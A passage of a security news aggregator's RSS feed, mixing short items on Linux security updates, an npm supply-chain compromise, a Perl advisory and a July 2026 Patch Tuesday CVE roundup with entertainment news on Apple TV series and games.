This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-15392">CVE-2026-15392</a>. It is possible to launch the attack on the local host. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (cifs-utils, corosync, cups, freerdp, git-lfs, go-fdo-client and go-fdo-server, go-toolset:rhel8, kernel, kernel-rt, libinput, libxml2, nginx:1.24, openssl, pacemaker, perl-DBI:1.641, php8.4, python-pillow, python3, and python3.12), Debian (grub2, li...]]></description>
<link>https://tsecurity.de/de/3670811/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670811/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 15 Jul 2026 15:24:57 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (cifs-utils, corosync, cups, freerdp, git-lfs, go-fdo-client and go-fdo-server, go-toolset:rhel8, kernel, kernel-rt, libinput, libxml2, nginx:1.24, openssl, pacemaker, perl-DBI:1.641, php8.4, python-pillow, python3, and python3.12), <b>Debian</b> (grub2, libxfont, opam, and wolfssl), <b>Fedora</b> (freerdp, kernel, and prometheus), <b>Mageia</b> (imagemagick), <b>Oracle</b> (buildah, freerdp, gimp, kernel, nginx, openexr, openssl, perl-DBI, podman, vim, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Red Hat</b> (python3.12), <b>SUSE</b> (afterburn, buildah, busybox, enc, freetype2-devel, go1.25, go1.25-openssl, go1.26-openssl, gosec, grafana, helm, krb5, kubernetes-old, libopenbabel8, libxml2, libxml2-16, nasm, openssl-3, patch, python-Authlib, python-mistune, python-soupsieve, python-sqlparse, python3-dulwich, python313-Pillow, rootlesskit, sbootutil-1, tomcat, and tomcat11), and <b>Ubuntu</b> (alsa-lib, dnsmasq, gnutls28, libheif, linux-aws, linux-fips, linux-lts-xenial, linux-gcp-5.15, linux-intel-iotg-5.15, linux-hwe-6.17, linux-raspi, mariadb, openvpn, python-httplib2, vim, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[Ted Lasso Season 4 Release Date, Cast and Story: Everything Confirmed So Far]]></title>
<description><![CDATA[Ted Lasso Season 4 officially arrives on Apple TV on August 5, 2026. Jason Sudeikis returns as Ted, who faces a completely new challenge after leaving AFC Richmond and returning home at the end of Season 3.




Release date: August 5, 2026



Streaming platform: Apple TV



Genre: Sports comedy-d...]]></description>
<link>https://tsecurity.de/de/3670810/ios-mac-os/ted-lasso-season-4-release-date-cast-and-story-everything-confirmed-so-far/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670810/ios-mac-os/ted-lasso-season-4-release-date-cast-and-story-everything-confirmed-so-far/</guid>
<pubDate>Wed, 15 Jul 2026 15:24:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ted Lasso Season 4 officially arrives on Apple TV on August 5, 2026. Jason Sudeikis returns as Ted, who faces a completely new challenge after leaving AFC Richmond and returning home at the end of Season 3.




Release date: August 5, 2026



Streaming platform: Apple TV



Genre: Sports comedy-drama



Number of episodes: 10



Release schedule: One new episode every Wednesday



Season finale date: October 7, 2026



Lead cast: Jason Sudeikis, Hannah Waddingham, Juno Temple, Brett Goldstein, Brendan Hunt and Jeremy Swift



New cast: Tanya Reynolds, Jude Mack, Faye Marsay, Rex Hayes, Aisling Sharkey, Abbie Hern and Grant Feely




The first episode will premiere on August 5, followed by weekly episodes through October 7. This means viewers will once again follow the season over several weeks instead of receiving all 10 episodes at once.




https://www.youtube.com/watch?v=PxZg4SfIURg




What is the story of Ted Lasso Season 4?



Possible spoilers for the first three seasons follow.



Season 4 brings Ted back to Richmond, where he begins coaching a second-division women’s football team. The new position becomes one of the biggest challenges of his career, as Ted must build another team while adjusting to a different side of professional football.



The storyline follows the idea introduced near the end of Season 3, when Keeley presented Rebecca with plans to create an AFC Richmond women’s team. That proposal now appears to form the main foundation of the new season.



Ted’s return also raises several personal questions. Season 3 ended with him leaving England to spend more time with his son, Henry. Season 4 will need to explain why he returns to Richmond, how his family situation has changed, and whether Henry becomes part of his life in England.



The official description says Ted and the new team will learn to take chances before knowing how everything will work out. That theme fits the show’s focus on personal growth, teamwork, and people finding confidence during uncertain moments.



Which cast members are returning?



Jason Sudeikis returns as Ted Lasso and continues to serve as an executive producer. Hannah Waddingham is back as AFC Richmond owner Rebecca Welton, while Juno Temple returns as Keeley Jones.



Brett Goldstein will also appear again as Roy Kent. Brendan Hunt returns as Coach Beard, and Jeremy Swift reprises his role as Leslie Higgins. Their confirmed involvement suggests AFC Richmond’s familiar leadership group will remain closely connected to Ted’s new team.



The season also introduces Tanya Reynolds, Jude Mack, Faye Marsay, Rex Hayes, Aisling Sharkey, Abbie Hern and Grant Feely. Details about most of their characters remain limited, although several of them are expected to be connected to the new women’s football storyline.



Will the original AFC Richmond players return?



Apple has not confirmed every member of the original men’s team for Season 4. The announced returning cast currently includes Ted, Rebecca, Keeley, Roy, Coach Beard, and Higgins.



Characters such as Jamie Tartt, Sam Obisanya, Dani Rojas and Isaac McAdoo could still appear, especially because the story remains centred around Richmond. However, their involvement should remain unconfirmed until further announcements or episodes reveal more.



Ted Lasso Season 4 begins streaming on Apple TV on August 5, 2026. What do you plan to watch when Ted returns to Richmond? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AsyncAPI npm Supply Chain Attack: Malware Injected Into Packages With 2 Million Weekly Downloads]]></title>
<description><![CDATA[AsyncAPI npm packages with 2M weekly downloads were compromised, spreading malware with info-stealing, crypto-theft and RAT capabilities. OX Security researchers disclosed on July 14 that the AsyncAPI npm organization was compromised, with malicious code injected into four packages that together ...]]></description>
<link>https://tsecurity.de/de/3670618/hacking/asyncapi-npm-supply-chain-attack-malware-injected-into-packages-with-2-million-weekly-downloads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670618/hacking/asyncapi-npm-supply-chain-attack-malware-injected-into-packages-with-2-million-weekly-downloads/</guid>
<pubDate>Wed, 15 Jul 2026 14:24:12 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AsyncAPI npm packages with 2M weekly downloads were compromised, spreading malware with info-stealing, crypto-theft and RAT capabilities. OX Security researchers disclosed on July 14 that the AsyncAPI npm organization was compromised, with malicious code injected into four packages that together account for over 2 million weekly downloads. The affected versions are @asyncapi/generator 3.3.1, @asyncapi/generator-components 0.7.1, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Ted Lasso Season 4 Release Date, Cast and Story: Everything Confirmed So Far]]></title>
<description><![CDATA[Ted Lasso Season 4 officially arrives on Apple TV on August 5, 2026. Jason Sudeikis returns as Ted, who faces a completely new challenge after leaving AFC Richmond and returning home at the end of Season 3.




Release date: August 5, 2026



Streaming platform: Apple TV



Genre: Sports comedy-d...]]></description>
<link>https://tsecurity.de/de/3670539/ios-mac-os/ted-lasso-season-4-release-date-cast-and-story-everything-confirmed-so-far/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670539/ios-mac-os/ted-lasso-season-4-release-date-cast-and-story-everything-confirmed-so-far/</guid>
<pubDate>Wed, 15 Jul 2026 13:55:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ted Lasso Season 4 officially arrives on Apple TV on August 5, 2026. Jason Sudeikis returns as Ted, who faces a completely new challenge after leaving AFC Richmond and returning home at the end of Season 3.




Release date: August 5, 2026



Streaming platform: Apple TV



Genre: Sports comedy-drama



Number of episodes: 10



Release schedule: One new episode every Wednesday



Season finale date: October 7, 2026



Lead cast: Jason Sudeikis, Hannah Waddingham, Juno Temple, Brett Goldstein, Brendan Hunt and Jeremy Swift



New cast: Tanya Reynolds, Jude Mack, Faye Marsay, Rex Hayes, Aisling Sharkey, Abbie Hern and Grant Feely




The first episode will premiere on August 5, followed by weekly episodes through October 7. This means viewers will once again follow the season over several weeks instead of receiving all 10 episodes at once.




https://www.youtube.com/watch?v=PxZg4SfIURg




What is the story of Ted Lasso Season 4?



Possible spoilers for the first three seasons follow.



Season 4 brings Ted back to Richmond, where he begins coaching a second-division women’s football team. The new position becomes one of the biggest challenges of his career, as Ted must build another team while adjusting to a different side of professional football.



The storyline follows the idea introduced near the end of Season 3, when Keeley presented Rebecca with plans to create an AFC Richmond women’s team. That proposal now appears to form the main foundation of the new season.



Ted’s return also raises several personal questions. Season 3 ended with him leaving England to spend more time with his son, Henry. Season 4 will need to explain why he returns to Richmond, how his family situation has changed, and whether Henry becomes part of his life in England.



The official description says Ted and the new team will learn to take chances before knowing how everything will work out. That theme fits the show’s focus on personal growth, teamwork, and people finding confidence during uncertain moments.



Which cast members are returning?



Jason Sudeikis returns as Ted Lasso and continues to serve as an executive producer. Hannah Waddingham is back as AFC Richmond owner Rebecca Welton, while Juno Temple returns as Keeley Jones.



Brett Goldstein will also appear again as Roy Kent. Brendan Hunt returns as Coach Beard, and Jeremy Swift reprises his role as Leslie Higgins. Their confirmed involvement suggests AFC Richmond’s familiar leadership group will remain closely connected to Ted’s new team.



The season also introduces Tanya Reynolds, Jude Mack, Faye Marsay, Rex Hayes, Aisling Sharkey, Abbie Hern and Grant Feely. Details about most of their characters remain limited, although several of them are expected to be connected to the new women’s football storyline.



Will the original AFC Richmond players return?



Apple has not confirmed every member of the original men’s team for Season 4. The announced returning cast currently includes Ted, Rebecca, Keeley, Roy, Coach Beard, and Higgins.



Characters such as Jamie Tartt, Sam Obisanya, Dani Rojas and Isaac McAdoo could still appear, especially because the story remains centred around Richmond. However, their involvement should remain unconfirmed until further announcements or episodes reveal more.



Ted Lasso Season 4 begins streaming on Apple TV on August 5, 2026. What do you plan to watch when Ted returns to Richmond? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Perl: Schwachstelle ermöglicht Denial of Service]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Perl ausnutzen, um einen Denial of Service Angriff durchzuführen.]]></description>
<link>https://tsecurity.de/de/3670379/it-security-nachrichten/neu-mittel-perl-schwachstelle-ermoeglicht-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670379/it-security-nachrichten/neu-mittel-perl-schwachstelle-ermoeglicht-denial-of-service/</guid>
<pubDate>Wed, 15 Jul 2026 12:53:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Perl ausnutzen, um einen Denial of Service Angriff durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Take Back Control as Enterprises Struggle to Incorporate Risks They Don't Understand - Ben Lipczynski - BSW #456]]></title>
<description><![CDATA[More than 48,000 vulnerabilities were disclosed in 2025, yet only about 1% are actively exploited. However, you're expected to mitigate all vulnerabilities, or at least critical and high. But what if there is no patch to fix the vulnerability or the software is unsupported? Ben Lipcynski, Directo...]]></description>
<link>https://tsecurity.de/de/3670161/it-security-nachrichten/take-back-control-as-enterprises-struggle-to-incorporate-risks-they-dont-understand-ben-lipczynski-bsw-456/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670161/it-security-nachrichten/take-back-control-as-enterprises-struggle-to-incorporate-risks-they-dont-understand-ben-lipczynski-bsw-456/</guid>
<pubDate>Wed, 15 Jul 2026 11:23:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>More than 48,000 vulnerabilities were disclosed in 2025, yet only about 1% are actively exploited. However, you're expected to mitigate all vulnerabilities, or at least critical and high. But what if there is no patch to fix the vulnerability or the software is unsupported?</p> <p>Ben Lipcynski, Director Security and Regulatory Services at Optima, joins Business Security Weekly to discuss how organizations can take back control of your enterprise software. OPTAS — Origina Proactive Threat Assurance Service — predicts, validates, prioritizes, and mitigates threats specific to your environment. Unlike AI vulnerability tools that flag everything without context or mitigation guidance, OPTAS cuts through the noise. OPTAS helps security teams focus on the risks that matter instead of chasing the 99% that do not.</p> <p>Segment Resources: - <a rel="noopener" target="_blank" href="https://www.origina.com/optas#optas-overview">https://www.origina.com/optas#optas-overview</a></p> <p>This segment is sponsored by Origina. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/origina">https://securityweekly.com/origina</a> to request a consultation.</p> <p>In the leadership and communications segment, US enterprises incorporate cyber risk into larger strategic focus, 75% of CISOs Fear Executives Don't Understand Cybersecurity Risks, AI agents are not your "coworkers", and more!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/bsw">https://www.securityweekly.com/bsw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/bsw-456">https://securityweekly.com/bsw-456</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Take Back Control as Enterprises Struggle to Incorporate Risks They Don't Understand - BSW #456]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 More than 48,000 vulnerabilities were disclosed in 2025, yet only about 1% are actively exploited.  However, you’re expected to mitigate all vulnerabilities, or at least critical and high.  But what if there is no patch to fix the...]]></description>
<link>https://tsecurity.de/de/3670153/it-security-video/take-back-control-as-enterprises-struggle-to-incorporate-risks-they-dont-understand-bsw-456/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670153/it-security-video/take-back-control-as-enterprises-struggle-to-incorporate-risks-they-dont-understand-bsw-456/</guid>
<pubDate>Wed, 15 Jul 2026 11:18:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/JXAof2gFJAU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>More than 48,000 vulnerabilities were disclosed in 2025, yet only about 1% are actively exploited.  However, you’re expected to mitigate all vulnerabilities, or at least critical and high.  But what if there is no patch to fix the vulnerability or the software is unsupported?<br />
<br />
Ben Lipcynski, Director Security and Regulatory Services at Optima, joins Business Security Weekly to discuss how organizations can take back control of your enterprise software.  OPTAS — Origina Proactive Threat Assurance Service — predicts, validates, prioritizes, and mitigates threats specific to your environment. Unlike AI vulnerability tools that flag everything without context or mitigation guidance, OPTAS cuts through the noise.  OPTAS helps security teams focus on the risks that matter instead of chasing the 99% that do not.<br />
<br />
Segment Resources:<br />
<br />
- https://www.origina.com/optas#optas-overview<br />
<br />
This segment is sponsored by Origina. Visit https://securityweekly.com/origina to request a consultation.<br />
<br />
In the leadership and communications segment, US enterprises incorporate cyber risk into larger strategic focus, 75% of CISOs Fear Executives Don’t Understand Cybersecurity Risks, AI agents are not your “coworkers”, and more!<br />
<br />
Visit https://www.securityweekly.com/bsw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/bsw-456<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Madden NFL 27 Arcade Edition Touches Down On Apple Arcade This August]]></title>
<description><![CDATA[Football fans have a new reason to check their devices this August. EA SPORTS is officially bringing Madden NFL 27 Arcade Edition to Apple Arcade on August 6. The popular games franchise is making a big return to mobile, giving players a complete football experience without any cost. It aims to d...]]></description>
<link>https://tsecurity.de/de/3670132/ios-mac-os/madden-nfl-27-arcade-edition-touches-down-on-apple-arcade-this-august/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670132/ios-mac-os/madden-nfl-27-arcade-edition-touches-down-on-apple-arcade-this-august/</guid>
<pubDate>Wed, 15 Jul 2026 11:10:17 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Football fans have a new reason to check their devices this August. EA SPORTS is officially bringing Madden NFL 27 Arcade Edition to Apple Arcade on August 6. The popular games franchise is making a big return to mobile, giving players a complete football experience without any cost. It aims to deliver authentic simulation gameplay featuring current NFL rosters directly to your hands.



The new edition includes complete franchise and quick play modes



Players get a full version of Madden free from ads or in-app purchases. You can jump straight into Quick Play for a fast match or take the reins in Franchise mode. The game uses a weekly story engine to build season-shifting narratives while you manage finances and try to win over the fan base. It tracks real-world NFL performances to update dynamic player ratings throughout the year.



The game offers full controller support across your iPhone, Mac, iPad, and Apple TV. This lets you easily pick up where you left off, whether you are playing at home or taking your team on the road.



More retro football hits join the subscription service this fall



Madden is not the only football title arriving soon. On August 6, Retro Bowl College+ also joins the service, letting you manage one of 250 college teams in an 8-bit style. Following that, NFL Retro Bowl '27 launches on September 3. It introduces a new Gauntlet Mode where players start with limited resources and try to survive a gruelling 15-game win streak.



Apple also rolled out updates for other sports titles. NBA 2K26 Arcade Edition recently added Tyrese Maxey as a Paragon player, while PGA TOUR Pro Golf brought in the Bear's Best Atlanta course.



Adding a heavyweight franchise like Madden shows a clear push to make the subscription service a serious destination for sports fans. With zero microtransactions getting in the way, players finally get a clean, uninterrupted football simulation they can take anywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fertigung im KI-Zeitalter: Hacker nehmen Fabriken ins Visier | Computer Weekly]]></title>
<description><![CDATA[Hunderte oder Tausende vernetzter Geräte sind potenzielle Einfallstore für Hacker und andere Bedrohungen. Oft werden die Pläne zur Einführung von KI- ...]]></description>
<link>https://tsecurity.de/de/3670123/hacking/fertigung-im-ki-zeitalter-hacker-nehmen-fabriken-ins-visier-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670123/hacking/fertigung-im-ki-zeitalter-hacker-nehmen-fabriken-ins-visier-computer-weekly/</guid>
<pubDate>Wed, 15 Jul 2026 11:09:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hunderte oder Tausende vernetzter Geräte sind potenzielle Einfallstore für <b>Hacker</b> und andere Bedrohungen. Oft werden die Pläne zur Einführung von KI- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Anya Taylor-Joy’s Lucky Is Now Streaming on Apple TV: Everything You Need to Know]]></title>
<description><![CDATA[Apple TV has premiered its new limited series Lucky, starring Anya Taylor-Joy as a skilled con artist trying to escape the criminal life that shaped her. The crime thriller made its global debut on Wednesday, July 15, 2026, with its first two episodes available together.



Taylor-Joy also serves...]]></description>
<link>https://tsecurity.de/de/3669616/ios-mac-os/anya-taylor-joys-lucky-is-now-streaming-on-apple-tv-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669616/ios-mac-os/anya-taylor-joys-lucky-is-now-streaming-on-apple-tv-everything-you-need-to-know/</guid>
<pubDate>Wed, 15 Jul 2026 07:08:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has premiered its new limited series Lucky, starring Anya Taylor-Joy as a skilled con artist trying to escape the criminal life that shaped her. The crime thriller made its global debut on Wednesday, July 15, 2026, with its first two episodes available together.



Taylor-Joy also serves as an executive producer on the series, which is based on Marissa Stapley’s bestselling novel of the same name. The supporting cast includes Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey, Clifton Collins Jr., William Fichtner, and Mo McRae.



The remaining episodes will arrive every Wednesday, giving Apple TV viewers a new chapter each week through the middle of August.




Number of episodes: Seven



Genre: Crime thriller and drama



Premiere date: July 15, 2026



Finale date: August 19, 2026



Release schedule: First two episodes on July 15, followed by one episode every Wednesday



Rating: TV-MA



Streaming platform: Apple TV




What is Lucky about?



Lucky follows a young woman who was raised inside a life of crime but managed to leave that world behind. Her attempt to build a safer future falls apart when circumstances force her to use her criminal skills one final time.



Anya Taylor-Joy plays Lucky Armstrong, a clever and experienced grifter who becomes trapped between dangerous criminals and investigators chasing her. Her final job goes badly, leaving her without the freedom and security she expected.



The story moves between Lucky’s troubled past and her increasingly dangerous present. As she runs out of people she can trust, she must rely on deception, quick decisions, and the survival skills taught to her by her family.



Where is the story heading?



Minor spoilers ahead.



The opening episodes place Lucky at the centre of a failed criminal plan involving stolen money, betrayal, and a growing law-enforcement investigation. Her husband, Cary, played by Drew Starkey, also becomes an important part of the mystery surrounding what happened after their plan collapsed.



Timothy Olyphant appears as Lucky’s estranged father, while Annette Bening plays Priscilla, a powerful and ruthless criminal figure. Aunjanue Ellis-Taylor joins the story as FBI agent Billie Rand, who follows Lucky’s trail while trying to understand the larger operation around her.



As the series continues, Lucky will have to confront the people who shaped her criminal past while deciding how far she is prepared to go for a fresh start. The weekly release schedule should gradually reveal who betrayed her, where the missing money went, and whether Lucky can escape without becoming the person she wanted to leave behind.



FAQs



When did Lucky premiere on Apple TV?



Lucky premiered globally on Apple TV on Wednesday, July 15, 2026. The streaming service released the first two episodes together.



How many episodes are in Lucky?



The limited series has seven episodes. Following the two-episode premiere, five additional episodes will arrive weekly through August 19, 2026.



When will the Lucky finale be released?



The final episode of Lucky is scheduled to stream on Wednesday, August 19, 2026.



Is Lucky based on a book?



Yes. The series is based on Marissa Stapley’s bestselling 2021 novel Lucky, which follows a con artist forced to confront her past after a major scheme goes wrong.



Who stars alongside Anya Taylor-Joy?



The cast includes Annette Bening, Timothy Olyphant, Aunjanue Ellis-Taylor, Drew Starkey, Clifton Collins Jr., William Fichtner, and Mo McRae.



Is Lucky a limited series?



Yes. Apple TV describes Lucky as a limited drama series, so its seven episodes are designed to tell one complete story.



How much does Apple TV cost in the US?



Apple TV costs $12.99 per month in the United States after a seven-day free trial for eligible new subscribers.



The first two episodes of Lucky are now streaming on Apple TV, with new episodes arriving every Wednesday until August 19. Are you planning to watch Anya Taylor-Joy’s latest crime thriller? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday roundup: Microsoft fixes a monthly record 569 holes; SAP patches a critical memory corruption bug]]></title>
<description><![CDATA[Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.



Today the company issued a record number of patches, with 59 rated as critical. And Microsoft is now r...]]></description>
<link>https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</guid>
<pubDate>Wed, 15 Jul 2026 04:07:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.</p>



<p class="wp-block-paragraph">Today the company <a href="https://msrc.microsoft.com/update-guide/">issued a record number of patches</a>, with 59 rated as critical. And Microsoft is now recommending that customers accelerate their patching schedules to more quickly deal with critical flaws.</p>



<p class="wp-block-paragraph">“Normally we have to wait for October or November to determine if we’ll break the previous [annual] patch volume record,” which was 1,245 vulnerabilities found in 2020, commented <a href="https://www.tenable.com/profile/satnam-narang">Satnam Narang</a>, senior staff research engineer at Tenable. But not this year. Tenable counted 569 CVEs that were patched officially as part of this month’s Patch Tuesday, excluding the server-side updates not requiring user intervention, smashing last month’s record of 198 fixes</p>



<p class="wp-block-paragraph">It’s probable, he said, that by the end of this year, Microsoft will have found over 3,000 common vulnerabilities and exposures (CVEs).</p>



<p class="wp-block-paragraph">Today’s volume of holes is “striking,” he added, “but it reflects how good these tools have become at finding bugs, not how many of those bugs actually pose a risk to organizations.” </p>



<p class="wp-block-paragraph">Separately, SAP released 20<strong> </strong>new and updated security patches, including a critical memory corruption vulnerability in NetWeaver Application Server ABAP, SAP Kernel, and frontend services tied to SAP GUI for HTML, which has a CVSS score of 9.9.</p>



<h2 class="wp-block-heading">Microsoft patches</h2>



<p class="wp-block-paragraph">Among the huge number of CVEs that Microsoft found were three zero-days that need to be patched, including two that have been exploited in the wild. </p>



<p class="wp-block-paragraph">Those two are both elevation of privilege vulnerabilities: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155,</a> an Active Directory Federation Services (AD FS) flaw that allows attackers with limited access to elevate privileges to administrator, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, a Microsoft SharePoint Server vulnerability. </p>



<p class="wp-block-paragraph">The third is <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>, a security feature bypass in Windows BitLocker, which was noted as having been publicly disclosed. “We surmise that this could be related to a flurry of zero-day vulnerabilities disclosed by the researcher known as Nightmare Eclipse or Chaotic Eclipse,” Narang said, “though no official confirmation was made. We also know that the researcher promised to drop something on Patch Tuesday.”</p>



<p class="wp-block-paragraph">While these were the most noteworthy flaws this month, Narang said, for CSOs the July patches prove that the state of the Exploitability Index, which rates how likely a vulnerability is to be exploited, must shift, given the machine speed of exploit discovery. For example, he pointed out, in May, Microsoft originally tagged <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45659">CVE-2026-45659</a>, a SharePoint vulnerability, as exploitation less likely. However, the vulnerability was added to the US Cybersecurity &amp; Infrastructure Security Agency’s list of known exploited vulnerabilities on July 1.</p>



<p class="wp-block-paragraph">He added that Anthropic’s Red Team’s own findings for known vulnerabilities (n-days) revealed how fragile the monthly Patch Tuesday system has become, with its Mythos Preview model being able to produce proof-of-concept exploits for 13 of 14 vulnerabilities that were rated as Exploitation Less Likely or Exploitation Unlikely.</p>



<p class="wp-block-paragraph">“What this means is that our way of looking at Patch Tuesday has changed, because the exploitability index is centered around humans, not AI tools, and as these tools continue to improve, defense needs to improve alongside it,” Narang said.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/dustincchilds/">Dustin Childs</a>, head of threat awareness at TrendAI’s Zero Day Initiative, agreed.</p>



<p class="wp-block-paragraph">“To call this record-breaking is a massive understatement,” said Childs. “This is the ‘Mother of All Releases’. The bug apocalypse has fully descended upon us, with July’s numbers pushing the year-to-date CVE count past every single full-year total of the last 20 years. Security teams need to take an extended break from their regularly scheduled activities to eat this elephant one byte at a time, starting immediately with active exploits in Active Director FS and SharePoint.”</p>



<p class="wp-block-paragraph">He particularly drew attention to a near-perfect 9.9 CVSS flaw in Windows VMSwitch (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) that allows low-privileged attackers to escape virtual machine boundaries for full host compromise.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/bicer/">Jack Bicer</a>, director of vulnerability research at Action1, agreed that IT leadership should prioritize immediate remediation of the actively exploited Active Directory Federation Services elevation of privilege vulnerability and the SharePoint Server elevation of privilege vulnerability .</p>



<p class="wp-block-paragraph">After that, he said, priority should be given to these critical vulnerabilities: Active Directory Certificate Services Elevation of Privilege Vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>), which introduces the possibility of attackers impersonating trusted systems and potentially compromising AD through certificate abuse; a Windows Active Directory Domain Services remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) which enables unauthenticated remote code execution against one of the most critical components within Windows enterprise environments; a Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55944">CVE-2026-55944</a>); a Microsoft Exchange Server spoofing vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>); Microsoft SQL Server remote code execution vulnerabilities (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a>); and multiple Windows DHCP Server vulnerabilities. </p>



<p class="wp-block-paragraph">These holes create opportunities for attackers to compromise financial systems, communication platforms, databases, and core network infrastructure, Bicer pointed out, systems which often provide direct access to sensitive business information and frequently serve as high-value targets for ransomware operators and advanced threat actors. </p>



<p class="wp-block-paragraph">There are also important security updates for Microsoft Defender, Bicer added, noting that vulnerabilities affecting endpoint protection software deserve immediate attention because successful exploitation undermines one of the organization’s primary defensive controls.</p>



<h2 class="wp-block-heading">IT teams must prioritize</h2>



<p class="wp-block-paragraph"><a href="https://fsi.stanford.edu/people/andrew-j-grotto">AJ Grotto</a>, a research scholar at the Centre for International Security and Co-operation and former Senior White House Director for Cyber Policy, said that Microsoft’s July Patch Tuesday “is a stark reminder that security teams are now operating in an era of vulnerability volume and velocity. With 570 vulnerabilities patched, including three actively exploited zero-days, the biggest concern for CSOs isn’t just the number of flaws, but the concentration of risk around identity systems, collaboration platforms, and privilege escalation pathways. The actively exploited vulnerabilities in Active Directory Federation Services and SharePoint are especially concerning because they target technologies that sit at the center of enterprise trust and access.”</p>



